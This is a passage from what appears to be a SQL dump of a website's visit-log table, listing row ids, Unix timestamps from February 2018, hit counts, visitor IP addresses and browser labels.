0123,1519035672,1,1,0,0,'91.196.178.166','chrome'),(210124,1519035900,1,1,0,0,'54.36.149.19','other'),(210125,1519035936,1,1,0,0,'54.36.149.56','other'),(210126,1519036011,1,1,0,0,'91.234.79.137','chrome'),(210127,1519036382,1,1,0,0,'54.36.148.101','other'),(210128,1519036383,1,1,0,0,'54.36.148.11','other'),(210129,1519036535,1,1,0,0,'91.196.178.83','firefox'),(210130,1519036708,2,2,0,0,'91.196.178.135','chrome'),(210131,1519036839,1,1,0,0,'54.36.149.69','other'),(210132,1519037013,2,2,0,0,'91.196.178.80','chrome'),(210133,1519037104,1,1,0,0,'54.36.148.22','other'),(210134,1519037294,1,1,0,0,'54.36.149.89','other'),(210135,1519037548,1,1,0,0,'54.36.149.79','other'),(210136,1519037600,1,1,0,0,'141.8.132.22','other'),(210137,1519037695,1,1,0,0,'5.45.207.83','other'),(210138,1519037724,1,1,0,0,'54.36.148.242','other'),(210139,1519037729,1,1,0,0,'54.36.148.105','other'),(210140,1519037851,2,2,0,0,'54.36.148.246','other'),(210141,1519037992,1,1,0,0,'54.36.148.85','other'),(210142,1519038618,1,1,0,0,'54.36.149.0','other'),(210143,1519038625,1,1,0,0,'54.36.148.155','other'),(210144,1519038795,2,2,0,0,'37.73.157.226','chrome'),(210145,1519038839,1,1,0,0,'54.36.148.184','other'),(210146,1519038934,1,1,0,0,'54.36.148.211','other'),(210147,1519039046,1,1,0,0,'54.36.148.239','other'),(210148,1519039336,1,0,1,0,'66.249.66.80',''),(210149,1519039484,1,1,0,0,'54.36.148.54','other'),(210150,1519039488,1,1,0,0,'54.36.149.34','other'),(210151,1519039490,1,1,0,0,'54.36.149.27','other'),(210152,1519039562,1,1,0,0,'54.36.148.128','other'),(210153,1519039744,1,1,0,0,'91.196.178.6','chrome'),(210154,1519039878,1,1,0,0,'54.36.148.245','other'),(210155,1519039923,1,1,0,0,'54.36.149.35','other'),(210156,1519039933,1,1,0,0,'54.36.148.26','other'),(210157,1519039947,1,1,0,0,'54.36.148.250','other'),(210158,1519040225,1,1,0,0,'54.36.149.63','other'),(210159,1519040247,1,1,0,0,'54.36.148.173','other'),(210160,1519040454,1,1,0,0,'54.36.149.19','other'),(210161,1519040668,1,1,0,0,'54.36.148.86','other'),(210162,1519040768,1,1,0,0,'54.36.148.135','other'),(210163,1519040856,1,1,0,0,'54.36.148.247','other'),(210164,1519041062,1,1,0,0,'54.36.148.196','other'),(210165,1519041074,1,1,0,0,'54.36.149.35','other'),(210166,1519041213,1,1,0,0,'54.36.148.148','other'),(210167,1519041369,1,1,0,0,'54.36.149.38','other'),(210168,1519041892,68,68,0,0,'54.92.197.82','other'),(210169,1519042051,1,1,0,0,'54.36.148.198','other'),(210170,1519042066,1,1,0,0,'54.36.148.119','other'),(210171,1519042120,1,1,0,0,'207.46.13.106','other'),(210172,1519042200,1,1,0,0,'103.214.2.4','chrome'),(210173,1519042211,1,1,0,0,'54.36.148.69','other'),(210174,1519042307,1,1,0,0,'54.36.148.135','other'),(210175,1519042555,1,1,0,0,'54.36.148.145','other'),(210176,1519042659,1,1,0,0,'54.36.148.209','other'),(210177,1519042795,8,8,0,0,'54.92.197.82','other'),(210178,1519042858,1,1,0,0,'54.36.149.56','other'),(210179,1519042929,1,1,0,0,'54.36.148.67','other'),(210180,1519043075,1,1,0,0,'130.180.211.87','chrome'),(210181,1519043398,1,1,0,0,'54.36.148.192','other'),(210182,1519043445,1,1,0,0,'91.196.178.104','chrome'),(210183,1519043489,1,1,0,0,'54.36.148.154','other'),(210184,1519043550,1,1,0,0,'54.36.148.246','other'),(210185,1519043581,1,1,0,0,'54.36.148.222','other'),(210186,1519043630,2,2,0,0,'91.196.178.80','chrome'),(210187,1519043648,4,4,0,0,'91.196.177.46','chrome'),(210188,1519043738,1,1,0,0,'54.36.148.188','other'),(210189,1519043752,1,1,0,0,'91.196.179.33','firefox'),(210190,1519043858,1,1,0,0,'54.36.148.81','other'),(210191,1519044155,2,2,0,0,'130.180.220.114','chrome'),(210192,1519044445,1,1,0,0,'54.36.148.152','other'),(210193,1519044542,1,1,0,0,'54.36.149.82','other'),(210194,1519044554,1,1,0,0,'91.196.177.46','chrome'),(210195,1519044741,1,1,0,0,'83.170.240.174','chrome'),(210196,1519044796,1,1,0,0,'217.69.133.249','other'),(210197,1519044887,1,1,0,0,'157.55.39.239','other'),(210198,1519045173,1,1,0,0,'54.36.148.19','other'),(210199,1519045230,1,1,0,0,'54.36.148.37','other'),(210200,1519045288,1,1,0,0,'178.154.171.88','other'),(210201,1519045459,1,1,0,0,'91.196.177.46','chrome'),(210202,1519045551,1,1,0,0,'54.36.148.177','other'),(210203,1519045702,1,1,0,0,'8.29.198.26','other'),(210204,1519046040,1,1,0,0,'54.36.149.58','other'),(210205,1519046263,1,1,0,0,'91.211.135.105','firefox'),(210206,1519046512,1,1,0,0,'54.36.148.153','other'),(210207,1519046560,1,1,0,0,'54.36.149.33','other'),(210208,1519046587,1,1,0,0,'54.36.148.167','other'),(210209,1519046713,1,1,0,0,'54.36.148.54','other'),(210210,1519046745,1,1,0,0,'217.69.133.228','other'),(210211,1519046890,1,1,0,0,'54.37.85.62','other'),(210212,1519046909,1,1,0,0,'54.36.148.122','other'),(210213,1519047143,1,1,0,0,'66.249.66.80','chrome'),(210214,1519047440,1,1,0,0,'54.36.148.125','other'),(210215,1519047461,1,1,0,0,'54.36.149.16','other'),(210216,1519047530,1,1,0,0,'46.242.27.103','msie'),(210217,1519047532,1,1,0,0,'95.221.194.8','msie'),(210218,1519047537,1,1,0,0,'188.255.1.139','msie'),(210219,1519047539,1,1,0,0,'178.140.176.46','msie'),(210220,1519047540,1,1,0,0,'5.165.182.237','msie'),(210221,1519047590,1,1,0,0,'54.36.148.178','other'),(210222,1519047676,1,1,0,0,'54.36.149.14','other'),(210223,1519047793,1,1,0,0,'5.45.207.58','other'),(210224,1519047883,1,1,0,0,'54.36.148.147','other'),(210225,1519047959,1,0,1,0,'66.249.66.155',''),(210226,1519047999,1,1,0,0,'54.36.148.238','other'),(210227,1519048037,1,1,0,0,'192.187.101.178','firefox'),(210228,1519048134,1,1,0,0,'54.36.149.34','other'),(210229,1519048166,1,1,0,0,'95.134.192.209','chrome'),(210230,1519048421,2,2,0,0,'91.196.178.80','chrome'),(210231,1519048695,1,1,0,0,'54.36.148.156','other'),(210232,1519048713,1,0,1,0,'66.249.66.156',''),(210233,1519048736,1,1,0,0,'54.36.148.189','other'),(210234,1519048890,1,1,0,0,'217.69.133.191','other'),(210235,1519048969,1,1,0,0,'217.69.133.60','other'),(210236,1519049041,1,1,0,0,'54.36.148.251','other'),(210237,1519049128,3,3,0,0,'91.196.177.15','chrome'),(210238,1519049195,40,40,0,0,'69.197.163.234','other'),(210239,1519049208,1,1,0,0,'54.36.148.117','other'),(210240,1519049551,1,1,0,0,'54.36.148.239','other'),(210241,1519049620,1,1,0,0,'91.209.11.236','other'),(210242,1519049637,1,1,0,0,'54.36.149.22','other'),(210243,1519049648,1,1,0,0,'54.36.149.63','other'),(210244,1519049678,1,1,0,0,'54.36.149.8','other'),(210245,1519050282,1,1,0,0,'91.196.178.166','chrome'),(210246,1519050527,1,1,0,0,'141.8.132.22','other'),(210247,1519050531,1,1,0,0,'5.45.207.83','other'),(210248,1519050580,1,1,0,0,'54.36.148.167','other'),(210249,1519050629,1,1,0,0,'54.36.148.208','other'),(210250,1519050714,1,1,0,0,'91.196.178.65','chrome'),(210251,1519050927,1,1,0,0,'54.36.148.136','other'),(210252,1519050954,1,1,0,0,'54.36.148.211','other'),(210253,1519051033,1,1,0,0,'54.36.149.8','other'),(210254,1519051060,1,1,0,0,'54.36.149.52','other'),(210255,1519051128,1,1,0,0,'54.36.148.225','other'),(210256,1519051268,1,1,0,0,'54.36.148.82','other'),(210257,1519051357,1,1,0,0,'199.58.86.209','other'),(210258,1519051405,1,0,1,0,'66.249.66.80',''),(210259,1519052016,1,1,0,0,'54.36.148.200','other'),(210260,1519052240,1,1,0,0,'54.36.149.41','other'),(210261,1519052681,1,1,0,0,'37.73.208.53','chrome'),(210262,1519052935,1,1,0,0,'54.36.148.88','other'),(210263,1519053222,1,1,0,0,'37.9.113.60','other'),(210264,1519053387,2,2,0,0,'91.196.178.83','chrome'),(210265,1519053483,2,2,0,0,'91.196.177.15','chrome'),(210266,1519053504,1,1,0,0,'37.54.188.127','chrome'),(210267,1519053673,1,1,0,0,'180.76.15.161','other'),(210268,1519053804,1,1,0,0,'54.36.148.206','other'),(210269,1519053854,1,1,0,0,'207.46.13.106','other'),(210270,1519053906,1,1,0,0,'54.36.148.181','other'),(210271,1519053946,1,1,0,0,'54.36.149.45','other'),(210272,1519054057,1,1,0,0,'194.12.93.51','chrome'),(210273,1519054147,1,1,0,0,'54.36.149.13','other'),(210274,1519054150,1,1,0,0,'54.36.149.77','other'),(210275,1519054234,1,1,0,0,'54.36.148.168','other'),(210276,1519054265,1,1,0,0,'91.209.11.236','other'),(210277,1519054561,1,1,0,0,'54.36.148.92','other'),(210278,1519054653,1,1,0,0,'188.230.43.254','other'),(210279,1519054898,1,1,0,0,'54.36.148.159','other'),(210280,1519055020,2,2,0,0,'54.36.148.210','other'),(210281,1519055073,1,1,0,0,'54.36.149.23','other'),(210282,1519055088,1,1,0,0,'54.36.149.36','other'),(210283,1519055106,1,1,0,0,'54.36.148.119','other'),(210284,1519055171,1,1,0,0,'54.36.148.24','other'),(210285,1519055205,1,1,0,0,'54.36.149.34','other'),(210286,1519055307,1,1,0,0,'54.36.148.79','other'),(210287,1519055413,1,1,0,0,'54.36.149.89','other'),(210288,1519056049,1,1,0,0,'54.36.148.255','other'),(210289,1519056293,1,1,0,0,'188.230.43.254','other'),(210290,1519056437,1,1,0,0,'54.36.148.249','other'),(210291,1519056500,1,1,0,0,'54.36.148.180','other'),(210292,1519056537,1,1,0,0,'8.29.198.26','other'),(210293,1519056549,1,1,0,0,'54.36.149.10','other'),(210294,1519056631,1,0,1,0,'66.249.66.156',''),(210295,1519056655,1,1,0,0,'217.69.133.239','other'),(210296,1519056753,1,1,0,0,'54.36.148.191','other'),(210297,1519057639,1,1,0,0,'66.249.66.156','chrome'),(210298,1519057657,1,1,0,0,'54.36.148.73','other'),(210299,1519057921,1,1,0,0,'54.36.149.13','other'),(210300,1519058034,1,1,0,0,'54.36.149.82','other'),(210301,1519058159,1,1,0,0,'54.36.148.88','other'),(210302,1519058238,1,1,0,0,'54.36.148.111','other'),(210303,1519058428,1,0,1,0,'66.249.66.16',''),(210304,1519058632,1,1,0,0,'217.69.133.250','other'),(210305,1519058857,1,1,0,0,'188.230.43.254','other'),(210306,1519059101,1,1,0,0,'213.180.203.40','other'),(210307,1519059393,1,1,0,0,'66.249.66.157','chrome'),(210308,1519059523,1,1,0,0,'54.36.148.202','other'),(210309,1519059679,1,1,0,0,'54.36.148.28','other'),(210310,1519060198,1,1,0,0,'54.36.148.153','other'),(210311,1519060460,1,1,0,0,'217.69.133.14','other'),(210312,1519060873,1,1,0,0,'54.36.148.164','other'),(210313,1519061236,1,1,0,0,'37.9.113.110','other'),(210314,1519061273,1,1,0,0,'54.36.149.105','other'),(210315,1519061455,1,1,0,0,'54.36.149.67','other'),(210316,1519061487,1,1,0,0,'94.178.117.34','firefox'),(210317,1519061619,1,1,0,0,'54.36.148.198','other'),(210318,1519061705,1,1,0,0,'54.36.149.28','other'),(210319,1519061813,1,1,0,0,'54.36.149.90','other'),(210320,1519061833,2,2,0,0,'91.196.178.4','chrome'),(210321,1519061941,1,1,0,0,'91.196.178.70','firefox'),(210322,1519061992,1,1,0,0,'54.36.149.32','other'),(210323,1519061996,1,1,0,0,'54.36.149.17','other'),(210324,1519062435,1,1,0,0,'54.36.149.46','other'),(210325,1519062486,1,1,0,0,'54.36.148.216','other'),(210326,1519062594,1,1,0,0,'54.36.148.64','other'),(210327,1519062653,1,1,0,0,'54.36.148.177','other'),(210328,1519062894,1,1,0,0,'54.36.148.146','other'),(210329,1519063047,1,1,0,0,'54.36.149.39','other'),(210330,1519063392,1,1,0,0,'54.36.149.52','other'),(210331,1519063466,2,2,0,0,'94.45.149.108','other'),(210332,1519063788,1,1,0,0,'66.249.83.218','chrome'),(210333,1519064053,1,1,0,0,'54.36.148.228','other'),(210334,1519064304,1,1,0,0,'54.36.148.35','other'),(210335,1519064561,1,1,0,0,'54.36.148.226','other'),(210336,1519064678,1,1,0,0,'54.36.149.95','other'),(210337,1519064918,1,1,0,0,'180.76.15.30','other'),(210338,1519064920,1,1,0,0,'54.36.149.81','other'),(210339,1519064976,1,1,0,0,'54.36.148.131','other'),(210340,1519064986,1,1,0,0,'54.36.149.97','other'),(210341,1519065046,1,1,0,0,'54.36.149.44','other'),(210342,1519065054,1,1,0,0,'54.36.148.152','other'),(210343,1519065420,1,1,0,0,'54.36.148.244','other'),(210344,1519065667,1,1,0,0,'54.36.149.39','other'),(210345,1519065864,1,1,0,0,'54.36.149.61','other'),(210346,1519065898,1,1,0,0,'217.69.133.218','other'),(210347,1519066133,1,1,0,0,'54.36.148.13','other'),(210348,1519066149,1,1,0,0,'192.187.101.178','firefox'),(210349,1519066176,4,4,0,0,'94.45.149.108','msie'),(210351,1519066177,1,1,0,0,'94.45.149.108','opera'),(210352,1519066178,36,36,0,0,'94.45.149.108','other'),(210353,1519066214,1,1,0,0,'54.36.148.239','other'),(210354,1519066470,1,1,0,0,'54.36.148.35','other'),(210355,1519066499,1,1,0,0,'54.36.148.123','other'),(210356,1519066516,1,1,0,0,'54.36.148.224','other'),(210357,1519066674,1,1,0,0,'54.36.148.156','other'),(210358,1519066778,1,1,0,0,'54.36.148.31','other'),(210359,1519066955,1,1,0,0,'54.36.148.225','other'),(210360,1519066975,1,1,0,0,'54.36.148.215','other'),(210361,1519067188,1,1,0,0,'157.55.39.239','other'),(210362,1519067370,1,1,0,0,'8.29.198.26','other'),(210363,1519067450,1,1,0,0,'54.36.148.83','other'),(210364,1519067546,1,1,0,0,'54.36.149.98','other'),(210365,1519067556,1,1,0,0,'54.36.149.80','other'),(210366,1519067595,1,1,0,0,'54.36.148.230','other'),(210367,1519067741,1,1,0,0,'54.36.148.117','other'),(210368,1519067854,1,1,0,0,'194.1.221.28','chrome'),(210369,1519068149,1,1,0,0,'5.45.207.58','other'),(210370,1519068780,1,1,0,0,'54.36.148.165','other'),(210371,1519068788,1,1,0,0,'46.219.6.144','chrome'),(210372,1519069043,1,1,0,0,'54.36.149.15','other'),(210373,1519069832,1,1,0,0,'54.36.148.151','other'),(210374,1519069867,1,1,0,0,'141.8.142.74','other'),(210375,1519069897,1,1,0,0,'54.36.148.209','other'),(210376,1519070056,1,1,0,0,'54.36.149.56','other'),(210377,1519070059,1,1,0,0,'54.36.149.85','other'),(210378,1519070272,1,1,0,0,'54.36.148.128','other'),(210379,1519070660,1,1,0,0,'217.69.133.218','other'),(210380,1519070670,1,1,0,0,'54.36.148.111','other'),(210381,1519070729,1,1,0,0,'54.36.148.108','other'),(210382,1519071572,1,1,0,0,'54.36.148.177','other'),(210383,1519071893,1,1,0,0,'54.36.148.245','other'),(210384,1519071908,1,1,0,0,'207.46.13.60','other'),(210385,1519071983,1,1,0,0,'54.36.149.96','other'),(210386,1519072177,1,1,0,0,'54.36.149.36','other'),(210387,1519072353,1,0,1,0,'66.249.66.156',''),(210388,1519072658,1,1,0,0,'146.0.228.106','firefox'),(210389,1519072674,1,1,0,0,'54.36.148.180','other'),(210390,1519072725,1,1,0,0,'54.36.148.111','other'),(210391,1519073006,1,1,0,0,'54.36.148.104','other'),(210392,1519073055,1,1,0,0,'54.36.148.127','other'),(210393,1519073403,1,1,0,0,'178.154.171.10','other'),(210394,1519074221,1,1,0,0,'157.55.39.239','other'),(210395,1519074964,1,1,0,0,'54.36.148.107','other'),(210396,1519075027,1,1,0,0,'54.36.149.42','other'),(210397,1519075232,2,2,0,0,'54.36.148.195','other'),(210398,1519075376,1,1,0,0,'54.36.148.179','other'),(210399,1519075581,1,1,0,0,'54.36.148.246','other'),(210400,1519075632,1,1,0,0,'54.36.148.62','other'),(210401,1519075682,1,1,0,0,'54.36.148.158','other'),(210402,1519075755,1,1,0,0,'54.36.148.207','other'),(210403,1519076083,2,2,0,0,'157.55.39.239','other'),(210404,1519076347,1,1,0,0,'178.154.171.10','other'),(210405,1519076398,1,1,0,0,'54.36.148.182','other'),(210406,1519076421,1,1,0,0,'54.36.148.254','other'),(210407,1519076680,1,1,0,0,'54.36.148.139','other'),(210408,1519076969,1,1,0,0,'54.36.149.97','other'),(210409,1519076976,1,1,0,0,'54.36.148.150','other'),(210410,1519077080,1,1,0,0,'91.209.11.236','other'),(210411,1519077178,1,1,0,0,'54.36.148.60','other'),(210412,1519077211,1,1,0,0,'54.36.148.217','other'),(210413,1519077345,1,1,0,0,'54.36.149.7','other'),(210414,1519077399,1,1,0,0,'54.36.149.5','other'),(210415,1519077564,1,1,0,0,'54.36.149.67','other'),(210416,1519077686,1,1,0,0,'54.36.149.14','other'),(210417,1519077741,1,1,0,0,'54.36.149.1','other'),(210418,1519078204,1,1,0,0,'8.29.198.26','other'),(210419,1519078375,1,1,0,0,'54.36.149.95','other'),(210420,1519078585,1,1,0,0,'217.69.133.18','other'),(210421,1519078588,1,1,0,0,'217.69.133.12','other'),(210422,1519078708,1,1,0,0,'54.36.148.186','other'),(210423,1519078924,1,1,0,0,'54.36.149.39','other'),(210424,1519078955,1,1,0,0,'54.36.148.66','other'),(210425,1519079332,1,0,1,0,'66.249.66.156',''),(210426,1519079570,1,1,0,0,'54.36.148.216','other'),(210427,1519079684,1,1,0,0,'54.36.149.72','other'),(210428,1519079808,2,2,0,0,'54.36.148.153','other'),(210429,1519080014,1,1,0,0,'54.36.148.187','other'),(210430,1519080404,1,1,0,0,'54.36.148.71','other'),(210431,1519080420,1,0,1,0,'66.249.66.156',''),(210432,1519080510,1,1,0,0,'54.36.149.53','other'),(210433,1519080932,2,2,0,0,'54.87.171.157','other'),(210434,1519080951,1,1,0,0,'54.36.148.174','other'),(210435,1519081471,1,1,0,0,'54.36.148.240','other'),(210436,1519081506,1,1,0,0,'37.9.113.110','other'),(210437,1519081563,1,1,0,0,'54.36.148.163','other'),(210438,1519081647,1,1,0,0,'54.36.149.57','other'),(210439,1519081654,1,1,0,0,'54.36.148.105','other'),(210440,1519081704,1,1,0,0,'54.36.148.170','other'),(210441,1519081808,1,1,0,0,'54.36.148.67','other'),(210442,1519081908,1,1,0,0,'54.36.149.75','other'),(210443,1519081916,1,1,0,0,'217.69.133.68','other'),(210444,1519082290,1,1,0,0,'54.36.149.91','other'),(210445,1519082376,1,1,0,0,'54.36.148.62','other'),(210446,1519082408,1,1,0,0,'54.36.148.78','other'),(210447,1519082604,1,1,0,0,'54.36.148.156','other'),(210448,1519082643,1,1,0,0,'54.36.148.104','other'),(210449,1519082673,1,0,1,0,'66.249.66.156',''),(210450,1519082703,1,1,0,0,'54.36.148.124','other'),(210451,1519082895,1,1,0,0,'54.36.148.197','other'),(210452,1519083099,1,1,0,0,'54.36.149.5','other'),(210453,1519083501,1,1,0,0,'178.154.171.88','other'),(210454,1519084023,1,1,0,0,'54.36.148.134','other'),(210455,1519084216,1,1,0,0,'54.36.148.200','other'),(210456,1519084323,1,1,0,0,'54.36.149.94','other'),(210457,1519084359,1,1,0,0,'54.36.148.132','other'),(210458,1519084520,1,1,0,0,'54.36.149.66','other'),(210459,1519084818,1,1,0,0,'54.36.148.208','other'),(210460,1519084987,1,1,0,0,'54.36.149.48','other'),(210461,1519085262,1,1,0,0,'54.36.149.63','other'),(210462,1519085308,1,1,0,0,'54.87.171.157','other'),(210463,1519085313,1,1,0,0,'54.36.148.184','other'),(210464,1519085336,1,1,0,0,'87.250.224.85','other'),(210465,1519085354,1,1,0,0,'54.36.148.205','other'),(210466,1519085356,1,1,0,0,'54.36.148.62','other'),(210467,1519085646,1,0,1,0,'66.249.66.76',''),(210468,1519085811,1,1,0,0,'54.36.149.84','other'),(210469,1519085860,1,1,0,0,'54.36.148.54','other'),(210470,1519085862,1,1,0,0,'54.36.148.224','other'),(210471,1519085979,1,1,0,0,'54.36.149.74','other'),(210472,1519085996,2,2,0,0,'91.121.116.72','other'),(210473,1519086209,1,1,0,0,'54.36.148.245','other'),(210474,1519086323,1,1,0,0,'54.36.148.10','other'),(210475,1519086587,1,1,0,0,'54.36.148.34','other'),(210476,1519086620,1,1,0,0,'125.209.235.173','other'),(210477,1519086746,1,1,0,0,'54.36.149.37','other'),(210478,1519086831,1,1,0,0,'54.36.149.14','other'),(210479,1519087130,1,1,0,0,'54.36.149.34','other'),(210480,1519087145,1,1,0,0,'54.36.148.20','other'),(210481,1519087168,1,1,0,0,'54.36.148.130','other'),(210482,1519087461,1,1,0,0,'54.36.148.200','other'),(210483,1519087577,1,1,0,0,'54.36.148.60','other'),(210484,1519087645,1,1,0,0,'54.36.149.103','other'),(210485,1519087745,1,1,0,0,'54.36.149.81','other'),(210486,1519087746,1,1,0,0,'54.36.148.63','other'),(210487,1519088125,1,1,0,0,'54.36.148.243','other'),(210488,1519088153,1,0,1,0,'66.249.66.157',''),(210489,1519088157,1,1,0,0,'54.36.148.199','other'),(210490,1519088160,1,1,0,0,'54.36.148.103','other'),(210491,1519088173,1,1,0,0,'54.36.149.2','other'),(210492,1519088296,1,1,0,0,'54.36.148.110','other'),(210493,1519088329,1,0,1,0,'66.249.66.75',''),(210494,1519088863,1,1,0,0,'217.69.133.28','other'),(210495,1519088964,1,1,0,0,'54.36.148.148','other'),(210496,1519089034,1,1,0,0,'8.29.198.27','other'),(210497,1519089094,1,1,0,0,'54.36.148.182','other'),(210498,1519089657,1,1,0,0,'54.36.148.132','other'),(210499,1519089743,1,1,0,0,'54.36.149.63','other'),(210500,1519089802,1,1,0,0,'66.249.66.75','chrome'),(210501,1519089950,1,1,0,0,'54.36.149.33','other'),(210502,1519089957,1,1,0,0,'54.36.148.168','other'),(210503,1519090017,1,1,0,0,'54.36.149.44','other'),(210504,1519090071,1,1,0,0,'54.36.148.151','other'),(210505,1519090163,1,1,0,0,'87.250.224.46','other'),(210506,1519090480,1,1,0,0,'54.36.148.103','other'),(210507,1519090492,1,1,0,0,'54.36.148.205','other'),(210508,1519090769,1,1,0,0,'54.36.149.1','other'),(210509,1519090815,1,1,0,0,'54.36.149.66','other'),(210510,1519090905,1,1,0,0,'54.36.148.120','other'),(210511,1519090922,1,1,0,0,'54.36.148.249','other'),(210512,1519090959,1,0,1,0,'66.249.66.156',''),(210513,1519091055,1,1,0,0,'54.36.148.169','other'),(210514,1519091080,1,1,0,0,'46.161.9.39','firefox'),(210515,1519091167,1,1,0,0,'47.52.16.210','opera'),(210516,1519091242,1,1,0,0,'54.36.149.91','other'),(210517,1519091345,1,1,0,0,'54.36.148.243','other'),(210518,1519091659,1,1,0,0,'54.36.148.29','other'),(210519,1519091711,1,1,0,0,'54.36.148.251','other'),(210520,1519091764,1,1,0,0,'54.36.148.69','other'),(210521,1519091844,1,1,0,0,'54.36.148.139','other'),(210522,1519091886,1,1,0,0,'54.36.148.230','other'),(210523,1519092195,1,1,0,0,'54.36.148.67','other'),(210524,1519092308,1,1,0,0,'54.36.148.117','other'),(210525,1519092361,1,1,0,0,'54.36.148.165','other'),(210526,1519092385,1,1,0,0,'54.36.148.164','other'),(210527,1519092633,1,1,0,0,'54.36.148.204','other'),(210528,1519092659,1,1,0,0,'54.36.148.238','other'),(210529,1519093046,1,1,0,0,'54.36.149.81','other'),(210530,1519093048,1,1,0,0,'54.36.148.116','other'),(210531,1519093060,1,1,0,0,'54.36.148.174','other'),(210532,1519093214,1,1,0,0,'54.36.148.45','other'),(210533,1519093386,1,1,0,0,'54.36.148.162','other'),(210534,1519093400,1,1,0,0,'54.36.148.245','other'),(210535,1519093622,1,1,0,0,'54.36.148.38','other'),(210536,1519093681,1,1,0,0,'37.9.113.114','other'),(210537,1519093826,1,1,0,0,'54.36.148.153','other'),(210538,1519094019,1,1,0,0,'54.36.148.128','other'),(210539,1519094102,1,1,0,0,'54.36.149.84','other'),(210540,1519094220,1,1,0,0,'54.36.148.174','other'),(210541,1519094337,1,1,0,0,'54.36.148.244','other'),(210542,1519094379,1,1,0,0,'54.36.148.97','other'),(210543,1519094561,2,2,0,0,'54.36.149.24','other'),(210544,1519094751,1,1,0,0,'54.36.148.178','other'),(210545,1519094754,1,1,0,0,'54.36.149.8','other'),(210546,1519095109,1,1,0,0,'54.36.148.90','other'),(210547,1519095350,1,1,0,0,'54.36.148.117','other'),(210548,1519095382,1,1,0,0,'204.79.180.11','msie'),(210549,1519095644,1,1,0,0,'54.36.149.99','other'),(210550,1519096318,1,1,0,0,'54.36.148.100','other'),(210551,1519096442,1,1,0,0,'46.183.219.231','firefox'),(210552,1519096640,1,1,0,0,'54.36.148.112','other'),(210553,1519096667,1,1,0,0,'54.36.148.103','other'),(210554,1519096809,1,1,0,0,'54.36.148.211','other'),(210555,1519096899,1,1,0,0,'54.36.148.223','other'),(210556,1519096979,1,1,0,0,'54.36.149.71','other'),(210557,1519096997,1,1,0,0,'54.36.148.157','other'),(210558,1519097090,1,1,0,0,'54.36.148.126','other'),(210559,1519097237,1,1,0,0,'54.36.148.77','other'),(210560,1519097576,1,1,0,0,'54.36.148.165','other'),(210561,1519097856,1,1,0,0,'54.36.148.68','other'),(210562,1519097878,1,1,0,0,'54.36.148.190','other'),(210563,1519097951,1,1,0,0,'204.79.180.12','msie'),(210564,1519098476,1,1,0,0,'54.36.149.86','other'),(210565,1519098606,1,1,0,0,'54.36.148.46','other'),(210566,1519098960,1,1,0,0,'54.36.148.113','other'),(210567,1519099020,1,1,0,0,'54.36.148.247','other'),(210568,1519099102,1,1,0,0,'54.36.148.127','other'),(210569,1519099482,1,1,0,0,'54.36.148.121','other'),(210570,1519099549,1,1,0,0,'54.36.148.97','other'),(210571,1519099551,1,1,0,0,'54.36.148.219','other'),(210572,1519099583,1,1,0,0,'54.36.149.100','other'),(210573,1519099682,1,1,0,0,'54.36.148.72','other'),(210574,1519099772,1,1,0,0,'217.69.133.235','other'),(210575,1519099855,1,1,0,0,'8.29.198.27','other'),(210576,1519099924,1,1,0,0,'54.36.148.80','other'),(210577,1519100217,1,1,0,0,'54.36.149.61','other'),(210578,1519100354,1,1,0,0,'54.36.148.164','other'),(210579,1519100493,1,1,0,0,'54.36.148.104','other'),(210580,1519100637,1,1,0,0,'54.36.148.193','other'),(210581,1519100734,1,1,0,0,'157.55.39.239','other'),(210582,1519100860,1,1,0,0,'54.36.148.19','other'),(210583,1519100869,1,1,0,0,'54.36.148.57','other'),(210584,1519100894,1,1,0,0,'178.154.200.32','other'),(210585,1519100967,1,1,0,0,'54.36.148.82','other'),(210586,1519100971,1,1,0,0,'54.36.148.236','other'),(210587,1519101119,1,1,0,0,'157.55.39.29','other'),(210588,1519101278,1,1,0,0,'54.36.148.232','other'),(210589,1519101352,1,1,0,0,'37.9.113.114','other'),(210590,1519101470,1,1,0,0,'195.208.13.254','chrome'),(210591,1519101570,1,1,0,0,'54.36.148.247','other'),(210592,1519101624,1,1,0,0,'54.36.149.32','other'),(210593,1519101880,1,1,0,0,'54.36.149.2','other'),(210594,1519101899,1,1,0,0,'54.36.148.151','other'),(210595,1519101920,1,1,0,0,'54.36.148.131','other'),(210596,1519101941,1,1,0,0,'54.36.148.194','other'),(210597,1519102070,1,1,0,0,'87.250.224.125','other'),(210598,1519102174,1,1,0,0,'54.36.149.93','other'),(210599,1519102304,1,1,0,0,'54.36.149.34','other'),(210600,1519102305,1,1,0,0,'37.9.113.151','other'),(210601,1519102413,1,1,0,0,'54.36.148.47','other'),(210602,1519102430,1,1,0,0,'207.46.13.7','other'),(210603,1519102595,1,1,0,0,'54.36.148.137','other'),(210604,1519102804,1,1,0,0,'54.36.148.223','other'),(210605,1519102949,1,1,0,0,'54.36.149.91','other'),(210606,1519103871,1,1,0,0,'192.187.101.178','firefox'),(210607,1519104052,1,0,1,0,'66.249.66.156',''),(210608,1519104541,1,1,0,0,'54.36.148.72','other'),(210609,1519104680,1,1,0,0,'54.36.149.22','other'),(210610,1519104688,1,1,0,0,'54.36.148.96','other'),(210611,1519104872,1,1,0,0,'54.36.149.26','other'),(210612,1519104884,1,1,0,0,'54.36.149.21','other'),(210613,1519105311,1,1,0,0,'54.36.148.88','other'),(210614,1519105345,1,1,0,0,'54.36.148.173','other'),(210615,1519105433,1,1,0,0,'54.36.149.6','other'),(210616,1519105499,1,1,0,0,'54.36.148.161','other'),(210617,1519105561,2,2,0,0,'46.211.148.37','chrome'),(210618,1519105613,1,1,0,0,'54.36.149.81','other'),(210619,1519105659,1,1,0,0,'54.36.148.180','other'),(210620,1519105697,1,1,0,0,'54.36.148.147','other'),(210621,1519105745,2,2,0,0,'54.36.149.95','other'),(210622,1519106047,1,1,0,0,'54.36.149.10','other'),(210623,1519106141,1,1,0,0,'54.36.149.29','other'),(210624,1519106162,1,0,1,0,'66.249.66.74',''),(210625,1519106830,1,1,0,0,'54.36.149.97','other'),(210626,1519106831,1,1,0,0,'54.36.149.38','other'),(210627,1519107010,1,0,1,0,'66.249.66.157',''),(210628,1519107106,1,1,0,0,'157.55.39.29','other'),(210629,1519107113,1,1,0,0,'54.36.148.128','other'),(210630,1519107119,1,1,0,0,'54.36.148.76','other'),(210631,1519107462,1,1,0,0,'207.46.13.60','other'),(210632,1519107539,1,1,0,0,'54.36.148.49','other'),(210633,1519107718,1,1,0,0,'54.36.149.3','other'),(210634,1519107827,9,9,0,0,'91.196.178.80','chrome'),(210635,1519107844,1,1,0,0,'54.36.149.98','other'),(210636,1519107899,1,1,0,0,'128.74.244.32','msie'),(210637,1519108307,1,0,1,0,'66.249.66.76',''),(210638,1519108729